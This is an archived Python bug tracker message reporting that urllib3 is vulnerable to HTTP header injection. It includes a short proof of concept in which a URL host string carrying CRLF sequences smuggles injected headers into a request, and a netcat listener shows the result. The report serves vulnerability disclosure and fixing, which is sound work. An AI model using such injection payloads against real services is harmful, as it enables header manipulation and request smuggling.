This issue tracker has been migrated to GitHub, and is currently read-only.
For more information, see the GitHub FAQs in the Python's Developer Guide.

Author vstinner
Recipients gregory.p.smith, martin.panter, orange, serhiy.storchaka, vstinner, ware, xiang.zhang, xtreak
Date 2019-04-10.12:32:58
SpamBayes Score -1.0
Marked as misclassified Yes
Message-id <>
bpo-36276 has been marked as a duplicate of this issue.

According to the following message, urllib3 is also vulnerable to HTTP Header Injection:

Copy of Alvin Chang's msg337837:

I am also seeing the same issue with urllib3 

import urllib3

pool_manager = urllib3.PoolManager()

host = "localhost:7777?a=1 HTTP/1.1\r\nX-injected: header\r\nTEST: 123"
url = "http://" + host + ":8080/test/?test=a"

    info = pool_manager.request('GET', url).info()
except Exception:

nc -l localhost 7777
GET /?a=1 HTTP/1.1
X-injected: header
TEST: 123:8080/test/?test=a HTTP/1.1
Host: localhost:7777
Accept-Encoding: identity
Date User Action Args
2019-04-10 12:32:58vstinnersetrecipients: + vstinner, gregory.p.smith, martin.panter, serhiy.storchaka, xiang.zhang, orange, xtreak, ware
2019-04-10 12:32:58vstinnersetmessageid: <>
2019-04-10 12:32:58vstinnerlinkissue30458 messages
2019-04-10 12:32:58vstinnercreate